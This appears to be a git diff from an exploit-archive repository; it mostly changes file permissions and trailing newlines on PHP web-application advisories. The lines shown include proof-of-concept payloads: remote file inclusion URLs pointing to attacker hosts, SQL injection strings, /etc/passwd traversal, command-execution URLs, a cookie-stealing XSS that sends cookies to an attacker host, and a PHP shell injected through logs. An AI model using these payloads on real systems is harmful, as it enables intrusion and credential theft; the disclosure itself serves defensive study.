-http://[target]/newtopic.php?subpath=http://[attacker]/banniere.php \ No newline at end of file +http://[target]/newtopic.php?subpath=http://[attacker]/banniere.php \ No newline at end of file diff --git a/platforms/php/webapps/21976.txt b/platforms/php/webapps/21976.txt old mode 100755 new mode 100644 index 3b0c6d61e..3c011d13b --- a/platforms/php/webapps/21976.txt +++ b/platforms/php/webapps/21976.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/6087/info Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter. http://target.server/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE= -http://attackers.server/&PHP_AUTO_LOAD_LIB=0 \ No newline at end of file +http://attackers.server/&PHP_AUTO_LOAD_LIB=0 \ No newline at end of file diff --git a/platforms/php/webapps/21977.txt b/platforms/php/webapps/21977.txt old mode 100755 new mode 100644 index d46e1805f..58c730c79 --- a/platforms/php/webapps/21977.txt +++ b/platforms/php/webapps/21977.txt @@ -7,4 +7,4 @@ The vulnerability is due to insufficient sanitization of variables used to const By injecting SQL code into variables, it may be possible for an attacker to corrupt database information. modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= -no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/* \ No newline at end of file +no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/* \ No newline at end of file diff --git a/platforms/php/webapps/2198.php b/platforms/php/webapps/2198.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21989.txt b/platforms/php/webapps/21989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2199.txt b/platforms/php/webapps/2199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21990.txt b/platforms/php/webapps/21990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2200.txt b/platforms/php/webapps/2200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22003.txt b/platforms/php/webapps/22003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22004.txt b/platforms/php/webapps/22004.txt old mode 100755 new mode 100644 index c169db865..3f02835e9 --- a/platforms/php/webapps/22004.txt +++ b/platforms/php/webapps/22004.txt @@ -40,5 +40,4 @@ The Full path can be retrieved using Array method [] in ItemID & id Parameters . Example : - http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 - \ No newline at end of file + http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 \ No newline at end of file diff --git a/platforms/php/webapps/22009.txt b/platforms/php/webapps/22009.txt old mode 100755 new mode 100644 index a29d760e3..c7370731f --- a/platforms/php/webapps/22009.txt +++ b/platforms/php/webapps/22009.txt @@ -4,4 +4,4 @@ An information disclosure vulnerability has been reported for httpbench. Reporte Information obtained in this manner may be used to launch further, destructive attacks against a vulnerable system. -http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 \ No newline at end of file +http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 \ No newline at end of file diff --git a/platforms/php/webapps/2201.txt b/platforms/php/webapps/2201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22017.txt b/platforms/php/webapps/22017.txt old mode 100755 new mode 100644 index 3d2d4b279..66b0994d6 --- a/platforms/php/webapps/22017.txt +++ b/platforms/php/webapps/22017.txt @@ -16,4 +16,4 @@ exit; Then submit the following request to the host running the vulnerable software: -http://www.example.com/quick_reply.php?phpbb_root_path=http://attackersite.tld/&mode=smilies \ No newline at end of file +http://www.example.com/quick_reply.php?phpbb_root_path=http://attackersite.tld/&mode=smilies \ No newline at end of file diff --git a/platforms/php/webapps/2202.txt b/platforms/php/webapps/2202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2203.txt b/platforms/php/webapps/2203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22030.php b/platforms/php/webapps/22030.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22037.txt b/platforms/php/webapps/22037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22038.txt b/platforms/php/webapps/22038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22039.txt b/platforms/php/webapps/22039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22042.php b/platforms/php/webapps/22042.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22043.txt b/platforms/php/webapps/22043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22044.txt b/platforms/php/webapps/22044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22047.txt b/platforms/php/webapps/22047.txt old mode 100755 new mode 100644 index db9ceb04c..ae495b22f --- a/platforms/php/webapps/22047.txt +++ b/platforms/php/webapps/22047.txt @@ -7,4 +7,4 @@ Programming errors in FreeNews could lead to the inclusion of arbitrary files on http://example.com/aff_news.php?chemin=http://example.org/include with http://example.org/config.php http://example.org/options.inc.php -http://example.org/freenews_functions.inc.php \ No newline at end of file +http://example.org/freenews_functions.inc.php \ No newline at end of file diff --git a/platforms/php/webapps/22048.txt b/platforms/php/webapps/22048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2205.txt b/platforms/php/webapps/2205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2206.txt b/platforms/php/webapps/2206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22065.html b/platforms/php/webapps/22065.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2207.txt b/platforms/php/webapps/2207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22071.txt b/platforms/php/webapps/22071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22073.txt b/platforms/php/webapps/22073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22075.txt b/platforms/php/webapps/22075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22076.txt b/platforms/php/webapps/22076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22077.txt b/platforms/php/webapps/22077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22080.txt b/platforms/php/webapps/22080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22083.txt b/platforms/php/webapps/22083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22086.txt b/platforms/php/webapps/22086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22087.txt b/platforms/php/webapps/22087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22088.txt b/platforms/php/webapps/22088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22089.txt b/platforms/php/webapps/22089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2209.txt b/platforms/php/webapps/2209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22090.txt b/platforms/php/webapps/22090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22097.txt b/platforms/php/webapps/22097.txt old mode 100755 new mode 100644 index ecde1ac13..50c8d3652 --- a/platforms/php/webapps/22097.txt +++ b/platforms/php/webapps/22097.txt @@ -37,6 +37,4 @@ Exploit: _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/22098.txt b/platforms/php/webapps/22098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22099.txt b/platforms/php/webapps/22099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22102.txt b/platforms/php/webapps/22102.txt old mode 100755 new mode 100644 index ebc84f0ec..e236998b4 --- a/platforms/php/webapps/22102.txt +++ b/platforms/php/webapps/22102.txt @@ -6,4 +6,4 @@ Exploiting this issue will cause the target server to disclose sensitive informa http://[target]/modules/Downloads/voteinclude.php http://[target]/modules/Your_Account/navbar.php -http://[target]/modules/Forums/attachment.php \ No newline at end of file +http://[target]/modules/Forums/attachment.php \ No newline at end of file diff --git a/platforms/php/webapps/22103.txt b/platforms/php/webapps/22103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22104.txt b/platforms/php/webapps/22104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22107.txt b/platforms/php/webapps/22107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22108.txt b/platforms/php/webapps/22108.txt old mode 100755 new mode 100644 index 9207d0ee8..22a7911c2 --- a/platforms/php/webapps/22108.txt +++ b/platforms/php/webapps/22108.txt @@ -4,4 +4,4 @@ Several vulnerabilities have been discovered in SPGPartenaires. The vulnerabilit By injecting SQL code into the 'pass' or 'SPGP' variable, it may be possible for an attacker to corrupt member information. It may also be possible for attackers to perform more advanced attacks on the underlying database. -http://www.example.com/modif/delete.php?SPGP=[ID]%7C%7C'%20OR%20''=' \ No newline at end of file +http://www.example.com/modif/delete.php?SPGP=[ID]%7C%7C'%20OR%20''=' \ No newline at end of file diff --git a/platforms/php/webapps/22109.txt b/platforms/php/webapps/22109.txt old mode 100755 new mode 100644 index 451740243..bdb6720fd --- a/platforms/php/webapps/22109.txt +++ b/platforms/php/webapps/22109.txt @@ -6,4 +6,4 @@ A problem with W-Agora may make cross-site scripting attacks possible. It has been reported that W-Agora has a vulnerability in the handling of script code. It is possible to format a malicious link containing arbitrary script code or HTML that when clicked on would execute in the security context of the vulnerable site. This would result in a browser security violation, and could lead to the theft of authentication cookies of administrators. -<URL:/editform.php?site=agora&blah=">Bug!> \ No newline at end of file +<URL:/editform.php?site=agora&blah=">Bug!> \ No newline at end of file diff --git a/platforms/php/webapps/2211.txt b/platforms/php/webapps/2211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22114.txt b/platforms/php/webapps/22114.txt old mode 100755 new mode 100644 index e36523456..75b5c8a7e --- a/platforms/php/webapps/22114.txt +++ b/platforms/php/webapps/22114.txt @@ -8,4 +8,4 @@ If the remote file is a PHP script, this may allow for execution of attacker-sup http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=. with : -http://[attacker]/lang/lang.php \ No newline at end of file +http://[attacker]/lang/lang.php \ No newline at end of file diff --git a/platforms/php/webapps/22115.txt b/platforms/php/webapps/22115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22116.txt b/platforms/php/webapps/22116.txt old mode 100755 new mode 100644 index 66e0cd97a..121ee76a9 --- a/platforms/php/webapps/22116.txt +++ b/platforms/php/webapps/22116.txt @@ -12,4 +12,4 @@ http://[attacker]/common/dbo/saveset.php http://[attacker]/common/dbo/recordset.php http://[attacker]/common/dbo/deleteset.php http://[attacker]/common/dbo/updateset.php -http://[attacker]/common/dbo/insertset.php \ No newline at end of file +http://[attacker]/common/dbo/insertset.php \ No newline at end of file diff --git a/platforms/php/webapps/2212.txt b/platforms/php/webapps/2212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22125.txt b/platforms/php/webapps/22125.txt old mode 100755 new mode 100644 index 664c6965b..ca41ba470 --- a/platforms/php/webapps/22125.txt +++ b/platforms/php/webapps/22125.txt @@ -7,4 +7,4 @@ When a victim user views any private messages, any malicious HTML code will be e Exploitation may allow for theft of cookie-based authentication credentials or other attacks. [IMG]http://[website]/img.gif"width="750"height="750"onmouseover=" -a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG] \ No newline at end of file +a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG] \ No newline at end of file diff --git a/platforms/php/webapps/22126.txt b/platforms/php/webapps/22126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22127.txt b/platforms/php/webapps/22127.txt old mode 100755 new mode 100644 index 75c57c342..8c7edd525 --- a/platforms/php/webapps/22127.txt +++ b/platforms/php/webapps/22127.txt @@ -6,4 +6,4 @@ An attacker may exploit this by supplying a path to a maliciously created file, If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. -http://www.example.com/library/lib.php?root=http://attacker.org \ No newline at end of file +http://www.example.com/library/lib.php?root=http://attacker.org \ No newline at end of file diff --git a/platforms/php/webapps/2213.txt b/platforms/php/webapps/2213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22133.txt b/platforms/php/webapps/22133.txt old mode 100755 new mode 100644 index b56029a83..cdc49f338 --- a/platforms/php/webapps/22133.txt +++ b/platforms/php/webapps/22133.txt @@ -5,4 +5,4 @@ Reportedly, myPHPNuke does not adequately filter HTML code thus making it prone This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. http://victim/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> -http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> \ No newline at end of file +http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/22134.txt b/platforms/php/webapps/22134.txt old mode 100755 new mode 100644 index e1b5e61f0..be00ea4ae --- a/platforms/php/webapps/22134.txt +++ b/platforms/php/webapps/22134.txt @@ -17,4 +17,4 @@ any_name.php Then request the following page: -http://www.example.com/s8forumfolder/users/any_name.php?cmd=uname%20-a \ No newline at end of file +http://www.example.com/s8forumfolder/users/any_name.php?cmd=uname%20-a \ No newline at end of file diff --git a/platforms/php/webapps/2214.txt b/platforms/php/webapps/2214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22146.txt b/platforms/php/webapps/22146.txt old mode 100755 new mode 100644 index 43ccd311f..7baf2cf24 --- a/platforms/php/webapps/22146.txt +++ b/platforms/php/webapps/22146.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6591/info It has been reported that a problem exists in the Reminder.php script distributed as part of YaBB SE. Due to insufficient sanitizing of input, it is possible for a remote user to inject arbitrary SQL into the database used by YaBB SE that could be used to reset or change the password of a user. -http://www.example.com/yabbse/Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername] \ No newline at end of file +http://www.example.com/yabbse/Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername] \ No newline at end of file diff --git a/platforms/php/webapps/22148.txt b/platforms/php/webapps/22148.txt old mode 100755 new mode 100644 index f384092b7..5555a0cdd --- a/platforms/php/webapps/22148.txt +++ b/platforms/php/webapps/22148.txt @@ -4,4 +4,4 @@ A problem with phpPass may allow an attacker to launch a SQL injection attack. The vulnerability exists in the accesscontrol.php script included with phpPass. Due to insufficient sanitization of user-supplied input, it is possible for a remote user to inject arbitrary SQL into the database used by a vulnerable site. This may allow an attacker to view pages that would normally be restricted. -http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' \ No newline at end of file +http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' \ No newline at end of file diff --git a/platforms/php/webapps/22149.txt b/platforms/php/webapps/22149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2215.txt b/platforms/php/webapps/2215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22150.txt b/platforms/php/webapps/22150.txt old mode 100755 new mode 100644 index dd90bb619..6b5ab70b4 --- a/platforms/php/webapps/22150.txt +++ b/platforms/php/webapps/22150.txt @@ -4,4 +4,4 @@ A file disclosure vulnerability has been reported for W-Agora. It has been repor An attacker can construct a URL consisting of dot-dot-slash (../) character sequences to obtain access to files outside of the document root. It should be noted that only files accessible by the web server will be disclosed to the attacker. -http://target/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 \ No newline at end of file +http://target/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 \ No newline at end of file diff --git a/platforms/php/webapps/22151.txt b/platforms/php/webapps/22151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22152.txt b/platforms/php/webapps/22152.txt old mode 100755 new mode 100644 index ffbb1eb5b..e097449e6 --- a/platforms/php/webapps/22152.txt +++ b/platforms/php/webapps/22152.txt @@ -214,6 +214,4 @@ chomp(my $target=<STDIN>); _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/22156.txt b/platforms/php/webapps/22156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22157.txt b/platforms/php/webapps/22157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22158.txt b/platforms/php/webapps/22158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22159.txt b/platforms/php/webapps/22159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2216.txt b/platforms/php/webapps/2216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22160.txt b/platforms/php/webapps/22160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22163.txt b/platforms/php/webapps/22163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22164.txt b/platforms/php/webapps/22164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22165.txt b/platforms/php/webapps/22165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22166.txt b/platforms/php/webapps/22166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22167.txt b/platforms/php/webapps/22167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22168.txt b/platforms/php/webapps/22168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2217.txt b/platforms/php/webapps/2217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22175.txt b/platforms/php/webapps/22175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22176.txt b/platforms/php/webapps/22176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22177.txt b/platforms/php/webapps/22177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2218.txt b/platforms/php/webapps/2218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22180.txt b/platforms/php/webapps/22180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22181.txt b/platforms/php/webapps/22181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22186.txt b/platforms/php/webapps/22186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2219.php b/platforms/php/webapps/2219.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22195.txt b/platforms/php/webapps/22195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2220.txt b/platforms/php/webapps/2220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22202.txt b/platforms/php/webapps/22202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22206.txt b/platforms/php/webapps/22206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22208.txt b/platforms/php/webapps/22208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22209.txt b/platforms/php/webapps/22209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2221.txt b/platforms/php/webapps/2221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22211.txt b/platforms/php/webapps/22211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22216.txt b/platforms/php/webapps/22216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2222.txt b/platforms/php/webapps/2222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22222.txt b/platforms/php/webapps/22222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2224.txt b/platforms/php/webapps/2224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22241.txt b/platforms/php/webapps/22241.txt old mode 100755 new mode 100644 index 0e4e74398..589f7d035 --- a/platforms/php/webapps/22241.txt +++ b/platforms/php/webapps/22241.txt @@ -8,4 +8,4 @@ If the remote file is a malicious PHP script, this may be exploited to execute a It has also been reported that it is possible to cause local files to be included, resulting in disclosure of webserver readable files to the attacker. This has not been confirmed. -http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php \ No newline at end of file +http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php \ No newline at end of file diff --git a/platforms/php/webapps/22242.txt b/platforms/php/webapps/22242.txt old mode 100755 new mode 100644 index 4d6fbb82e..752cd8ecd --- a/platforms/php/webapps/22242.txt +++ b/platforms/php/webapps/22242.txt @@ -8,4 +8,4 @@ If the remote file is a malicious PHP script, this may be exploited to execute a It has also been reported that it is possible to cause local files to be included, resulting in disclosure of webserver readable files to the attacker. This has not been confirmed. -http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php \ No newline at end of file +http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php \ No newline at end of file diff --git a/platforms/php/webapps/2225.txt b/platforms/php/webapps/2225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22252.txt b/platforms/php/webapps/22252.txt old mode 100755 new mode 100644 index a30823123..de36b8103 --- a/platforms/php/webapps/22252.txt +++ b/platforms/php/webapps/22252.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6862/info php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to php-board user and administrative passwords. -http://www.example.com/user/[NICKNAME].txt \ No newline at end of file +http://www.example.com/user/[NICKNAME].txt \ No newline at end of file diff --git a/platforms/php/webapps/22253.txt b/platforms/php/webapps/22253.txt old mode 100755 new mode 100644 index f15bb3837..4d9dde627 --- a/platforms/php/webapps/22253.txt +++ b/platforms/php/webapps/22253.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6866/info The DotBr 'system.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process. -http://www.example.com/admin/system.php3?cmd=[COMMAND] \ No newline at end of file +http://www.example.com/admin/system.php3?cmd=[COMMAND] \ No newline at end of file diff --git a/platforms/php/webapps/22254.txt b/platforms/php/webapps/22254.txt old mode 100755 new mode 100644 index 455076cc4..9af414b1c --- a/platforms/php/webapps/22254.txt +++ b/platforms/php/webapps/22254.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6867/info The DotBr 'exec.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process. -http://www.example.com/admin/exec.php3?cmd=[COMMAND] \ No newline at end of file +http://www.example.com/admin/exec.php3?cmd=[COMMAND] \ No newline at end of file diff --git a/platforms/php/webapps/22256.txt b/platforms/php/webapps/22256.txt old mode 100755 new mode 100644 index 8a41a0ca0..5d52134f9 --- a/platforms/php/webapps/22256.txt +++ b/platforms/php/webapps/22256.txt @@ -4,4 +4,4 @@ D-Forum is prone to an issue which may allow remote attackers to include files l Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters. -http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt \ No newline at end of file +http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt \ No newline at end of file diff --git a/platforms/php/webapps/22257.txt b/platforms/php/webapps/22257.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2226.txt b/platforms/php/webapps/2226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22266.php b/platforms/php/webapps/22266.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22267.php b/platforms/php/webapps/22267.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22268.txt b/platforms/php/webapps/22268.txt old mode 100755 new mode 100644 index 41bab6177..ea251cd5e --- a/platforms/php/webapps/22268.txt +++ b/platforms/php/webapps/22268.txt @@ -8,4 +8,4 @@ This vulnerability was reported for myPHPNuke 1.8.8 earlier versions may also be http://www.example.com/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent -http://www.example.com/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@olympos.org');[/scr!pt]?query= \ No newline at end of file +http://www.example.com/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@olympos.org');[/scr!pt]?query= \ No newline at end of file diff --git a/platforms/php/webapps/2227.txt b/platforms/php/webapps/2227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22277.txt b/platforms/php/webapps/22277.txt old mode 100755 new mode 100644 index a8d8de797..476c49d14 --- a/platforms/php/webapps/22277.txt +++ b/platforms/php/webapps/22277.txt @@ -8,4 +8,4 @@ The vulnerability was reported for Nuked-Klan beta 1.3; earlier versions may als http://www.example.org/index.php?file=Team&op=phpinfo http://www.example.org/index.php?file=News&op=phpinfo -http://www.example.org/index.php?file=Liens&op=phpinfo \ No newline at end of file +http://www.example.org/index.php?file=Liens&op=phpinfo \ No newline at end of file diff --git a/platforms/php/webapps/22279.txt b/platforms/php/webapps/22279.txt old mode 100755 new mode 100644 index 08052733c..b9a0d2afa --- a/platforms/php/webapps/22279.txt +++ b/platforms/php/webapps/22279.txt @@ -6,4 +6,4 @@ By crafting specific URI parameters it is possible for an attacker to influence This vulnerability has been reported for GONiCUS System Administrator Version 1, previous versions may also be affected. -http://www.example.org/include/help.php?base=http://www.attacker.org/ \ No newline at end of file +http://www.example.org/include/help.php?base=http://www.attacker.org/ \ No newline at end of file diff --git a/platforms/php/webapps/22281.php b/platforms/php/webapps/22281.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22282.txt b/platforms/php/webapps/22282.txt old mode 100755 new mode 100644 index a56e216df..8e78002e7 --- a/platforms/php/webapps/22282.txt +++ b/platforms/php/webapps/22282.txt @@ -8,4 +8,4 @@ An attacker can exploit this vulnerability and specify arbitrary files as the pa http://www.example.org/sendphoto.php?album=..&pic=config.inc.php -http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 \ No newline at end of file +http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 \ No newline at end of file diff --git a/platforms/php/webapps/22283.txt b/platforms/php/webapps/22283.txt old mode 100755 new mode 100644 index 67475c4ec..777aece5b --- a/platforms/php/webapps/22283.txt +++ b/platforms/php/webapps/22283.txt @@ -11,4 +11,4 @@ http://www.example.com/cutenews/shownews.php?cutepath=http://<attacker_site>/con ----------------------------------config.php---------------------------------------- /", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo " -"; } } } ?> \ No newline at end of file +"; } } } ?> \ No newline at end of file diff --git a/platforms/php/webapps/22284.txt b/platforms/php/webapps/22284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22285.txt b/platforms/php/webapps/22285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2229.txt b/platforms/php/webapps/2229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22293.txt b/platforms/php/webapps/22293.txt old mode 100755 new mode 100644 index 03731486c..34e8f1735 --- a/platforms/php/webapps/22293.txt +++ b/platforms/php/webapps/22293.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6970/info E-theni may allow inclusion of malicious remote files. This is due to remote users being able to influence the include path of an external file ('para_langue.php') referenced by the 'aff_liste_langue.php' script. This could result in arbitrary command execution. -http://www.example.com/admin_t/include/aff_liste_langue.php?rep_include=http://<attacker_site>/para_langue.php \ No newline at end of file +http://www.example.com/admin_t/include/aff_liste_langue.php?rep_include=http://<attacker_site>/para_langue.php \ No newline at end of file diff --git a/platforms/php/webapps/22295.txt b/platforms/php/webapps/22295.txt old mode 100755 new mode 100644 index 774d302ee..2a1b2508e --- a/platforms/php/webapps/22295.txt +++ b/platforms/php/webapps/22295.txt @@ -8,4 +8,4 @@ Under some circumstances, it may be possible for remote attackers to influence t If the remote file is a malicious file, this vulnerability may be exploited to execute arbitrary system commands in the context of the web server. -http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php \ No newline at end of file +http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php \ No newline at end of file diff --git a/platforms/php/webapps/22298.txt b/platforms/php/webapps/22298.txt old mode 100755 new mode 100644 index a368366a8..71526538d --- a/platforms/php/webapps/22298.txt +++ b/platforms/php/webapps/22298.txt @@ -7,4 +7,4 @@ This vulnerability is as a result of insufficient sanitization performed on remo If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f> -http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00' \ No newline at end of file +http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00' \ No newline at end of file diff --git a/platforms/php/webapps/22300.txt b/platforms/php/webapps/22300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2231.php b/platforms/php/webapps/2231.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22317.txt b/platforms/php/webapps/22317.txt old mode 100755 new mode 100644 index 0ee80d813..f164e6697 --- a/platforms/php/webapps/22317.txt +++ b/platforms/php/webapps/22317.txt @@ -6,4 +6,4 @@ This vulnerability is as a result of insufficient sanitization performed on remo Under some circumstances, it is possible for remote attackers to manipulate URI parameters to include external files on remote servers. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. -http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc \ No 